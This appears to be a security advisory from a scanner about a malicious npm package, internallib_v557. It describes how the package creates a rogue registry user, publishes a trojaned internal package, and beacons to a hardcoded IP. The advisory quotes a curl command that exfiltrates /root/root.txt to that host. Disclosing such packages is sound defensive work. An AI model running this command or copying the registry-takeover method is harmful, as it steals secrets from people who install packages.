internallib_v557 @1.0.24

Summary

index.js implements a multi-step attack against an internal npm registry. On invocation of the exported command(), it: (1) creates a Verdaccio user pwn99 / pwn99pass against http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99 via curl PUT; (2) queries the existing uhclabs_local_check package metadata; (3) writes /tmp/pwn99/.npmrc containing a base64-encoded _auth for those credentials; (4) npm publish es a malicious uhclabs_local_check@2.0.0 to http://0.0.0.0:4873/ whose package.json scripts.start is cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag ; and (5) at every step pipes output (user-create response, version listing, publish stdout/stderr, error output) to http://10.0.0.145:8888/step{1..n} via curl. The downstream effect: any installer who later pulls uhclabs_local_check from the internal registry and runs its start script will exfiltrate the contents of /root/root.txt to the hardcoded attacker IP. The attacker also leaves a persistent publishing identity on the internal registry usable for future malicious releases of internal packages. This is a self-propagating namespace-takeover attack with a hardcoded C2 beacon and attacker-controlled persistence — there is no legitimate purpose consistent with the package's stated 'internal lib' scope.

Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)